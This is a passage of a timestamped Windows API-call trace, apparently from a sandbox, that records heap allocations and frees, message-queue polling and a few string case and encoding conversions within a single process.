0x29f7698 [0085.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74958 | out: hHeap=0x2af0000) returned 1 [0085.625] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0085.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0085.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0085.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71308 [0085.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f40 [0085.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a712b8 [0085.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64708 [0085.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64738 [0085.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71318 [0085.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64570 [0085.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71318 | out: hHeap=0x2af0000) returned 1 [0085.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64570 | out: hHeap=0x2af0000) returned 1 [0085.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64738 | out: hHeap=0x2af0000) returned 1 [0085.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64708 | out: hHeap=0x2af0000) returned 1 [0085.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a712b8 | out: hHeap=0x2af0000) returned 1 [0085.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71308 | out: hHeap=0x2af0000) returned 1 [0085.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f40 | out: hHeap=0x2af0000) returned 1 [0085.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0085.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0085.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0085.626] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0085.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0085.626] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0085.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0085.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0085.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64570 [0085.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64708 [0085.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a711c8 [0085.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64738 [0085.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711c8 | out: hHeap=0x2af0000) returned 1 [0085.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64738 | out: hHeap=0x2af0000) returned 1 [0085.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64708 | out: hHeap=0x2af0000) returned 1 [0085.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64570 | out: hHeap=0x2af0000) returned 1 [0085.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0085.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0085.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a644f8 | out: hHeap=0x2af0000) returned 1 [0085.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730b8 | out: hHeap=0x2af0000) returned 1 [0085.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64510 | out: hHeap=0x2af0000) returned 1 [0085.626] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0085.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730b8 [0085.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a644f8 [0085.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64708 [0085.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71328 [0085.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64570 [0085.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71338 [0085.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7160 [0085.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64738 [0085.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64510 [0085.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a711c8 [0085.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64960 [0085.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711c8 | out: hHeap=0x2af0000) returned 1 [0085.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x3) returned 0x2a711f8 [0085.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a711a8 [0085.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71378 [0085.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0085.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a711c8 [0085.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a711c8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0085.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711c8 | out: hHeap=0x2af0000) returned 1 [0085.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711a8 | out: hHeap=0x2af0000) returned 1 [0085.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71378 | out: hHeap=0x2af0000) returned 1 [0085.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a712c8 [0085.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64960 | out: hHeap=0x2af0000) returned 1 [0085.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711f8 | out: hHeap=0x2af0000) returned 1 [0085.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a712c8 | out: hHeap=0x2af0000) returned 1 [0085.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64510 | out: hHeap=0x2af0000) returned 1 [0085.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64738 | out: hHeap=0x2af0000) returned 1 [0085.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64738 [0085.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64510 [0085.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71348 [0085.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a712f8 [0085.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64960 [0085.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64510 | out: hHeap=0x2af0000) returned 1 [0085.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71348 | out: hHeap=0x2af0000) returned 1 [0085.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64738 | out: hHeap=0x2af0000) returned 1 [0085.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64738 [0085.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64738 | out: hHeap=0x2af0000) returned 1 [0085.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7160 | out: hHeap=0x2af0000) returned 1 [0085.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71338 | out: hHeap=0x2af0000) returned 1 [0085.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71328 | out: hHeap=0x2af0000) returned 1 [0085.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f71e0 [0085.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71378 [0085.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64510 [0085.630] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0085.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69700 [0085.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64738 [0085.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71248 [0085.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a649a8 [0085.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71308 [0085.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a648b8 [0085.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71258 [0085.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64a08 [0085.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a711a8 [0085.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a08 | out: hHeap=0x2af0000) returned 1 [0085.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711a8 | out: hHeap=0x2af0000) returned 1 [0085.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a648b8 | out: hHeap=0x2af0000) returned 1 [0085.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71258 | out: hHeap=0x2af0000) returned 1 [0085.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a649a8 | out: hHeap=0x2af0000) returned 1 [0085.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71308 | out: hHeap=0x2af0000) returned 1 [0085.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71308 [0085.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x3) returned 0x2a712b8 [0085.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64510 | out: hHeap=0x2af0000) returned 1 [0085.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71378 | out: hHeap=0x2af0000) returned 1 [0085.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64960 | out: hHeap=0x2af0000) returned 1 [0085.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a712f8 | out: hHeap=0x2af0000) returned 1 [0085.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64570 | out: hHeap=0x2af0000) returned 1 [0085.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64708 | out: hHeap=0x2af0000) returned 1 [0085.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a644f8 | out: hHeap=0x2af0000) returned 1 [0085.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730b8 | out: hHeap=0x2af0000) returned 1 [0085.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64528 | out: hHeap=0x2af0000) returned 1 [0085.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0085.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64750 | out: hHeap=0x2af0000) returned 1 [0085.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6ee0 [0085.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69850 [0085.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64708 [0085.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0085.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64738 | out: hHeap=0x2af0000) returned 1 [0085.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71248 | out: hHeap=0x2af0000) returned 1 [0085.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69700 | out: hHeap=0x2af0000) returned 1 [0085.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0085.631] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0085.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64510 [0085.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64738 [0085.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71258 [0085.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6fa0 [0085.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a698b0 [0085.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64750 [0085.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71388 [0085.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71258 | out: hHeap=0x2af0000) returned 1 [0085.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64570 [0085.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71398 [0085.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a644f8 [0085.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64528 [0085.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a711c8 [0085.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64870 [0085.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711c8 | out: hHeap=0x2af0000) returned 1 [0085.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64870 | out: hHeap=0x2af0000) returned 1 [0085.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64528 | out: hHeap=0x2af0000) returned 1 [0085.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a644f8 | out: hHeap=0x2af0000) returned 1 [0085.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71398 | out: hHeap=0x2af0000) returned 1 [0085.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a644f8 [0085.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a712c8 [0085.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64528 [0085.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a712c8 | out: hHeap=0x2af0000) returned 1 [0085.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x3) returned 0x2a71278 [0085.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a711e8 [0085.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a712e8 [0085.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0085.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a711d8 [0085.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a711d8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0085.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711d8 | out: hHeap=0x2af0000) returned 1 [0085.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711e8 | out: hHeap=0x2af0000) returned 1 [0085.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a712e8 | out: hHeap=0x2af0000) returned 1 [0085.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a712a8 [0085.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64528 | out: hHeap=0x2af0000) returned 1 [0085.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a711c8 [0085.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x3) returned 0x2a712c8 [0085.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64750 | out: hHeap=0x2af0000) returned 1 [0085.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71388 | out: hHeap=0x2af0000) returned 1 [0085.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a698b0 | out: hHeap=0x2af0000) returned 1 [0085.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fa0 | out: hHeap=0x2af0000) returned 1 [0085.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64738 | out: hHeap=0x2af0000) returned 1 [0085.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64570 | out: hHeap=0x2af0000) returned 1 [0085.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71278 | out: hHeap=0x2af0000) returned 1 [0085.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a712a8 | out: hHeap=0x2af0000) returned 1 [0085.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a644f8 | out: hHeap=0x2af0000) returned 1 [0085.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64510 | out: hHeap=0x2af0000) returned 1 [0085.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a712c8 | out: hHeap=0x2af0000) returned 1 [0085.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711c8 | out: hHeap=0x2af0000) returned 1 [0085.633] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0085.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71318 [0085.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a644f8 [0085.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64738 [0085.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71378 [0085.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a790b0 [0085.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a711d8 [0085.633] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0085.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a790b0 | out: hHeap=0x2af0000) returned 1 [0085.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711d8 | out: hHeap=0x2af0000) returned 1 [0085.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2a64528 [0085.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0085.633] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0085.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71278 [0085.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71248 [0085.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64750 [0085.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64510 [0085.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a712d8 [0085.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64570 [0085.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a712d8 | out: hHeap=0x2af0000) returned 1 [0085.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a711d8 [0085.634] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a790b0 [0085.634] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0085.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a790b0 | out: hHeap=0x2af0000) returned 1 [0085.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711d8 | out: hHeap=0x2af0000) returned 1 [0085.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64570 | out: hHeap=0x2af0000) returned 1 [0085.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64510 | out: hHeap=0x2af0000) returned 1 [0085.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64750 | out: hHeap=0x2af0000) returned 1 [0085.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71248 | out: hHeap=0x2af0000) returned 1 [0085.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71278 | out: hHeap=0x2af0000) returned 1 [0085.634] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0085.634] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0085.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0085.634] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0085.634] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71338 [0085.634] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71248 [0085.634] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64510 [0085.634] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64570 [0085.634] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71328 [0085.634] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64750 [0085.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71328 | out: hHeap=0x2af0000) returned 1 [0085.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64750 | out: hHeap=0x2af0000) returned 1 [0085.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64570 | out: hHeap=0x2af0000) returned 1 [0085.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64510 | out: hHeap=0x2af0000) returned 1 [0085.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71248 | out: hHeap=0x2af0000) returned 1 [0085.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71338 | out: hHeap=0x2af0000) returned 1 [0085.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0085.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64528 | out: hHeap=0x2af0000) returned 1 [0085.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71378 | out: hHeap=0x2af0000) returned 1 [0085.634] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64510 [0085.634] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a712d8 [0085.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64528 [0085.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a712d8 | out: hHeap=0x2af0000) returned 1 [0085.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64750 [0085.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a712f8 [0085.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64570 [0085.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a712f8 | out: hHeap=0x2af0000) returned 1 [0085.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a647b0 [0085.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a712c8 [0085.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64960 [0085.635] HeapFree (in: hHeap=0x2af0000, 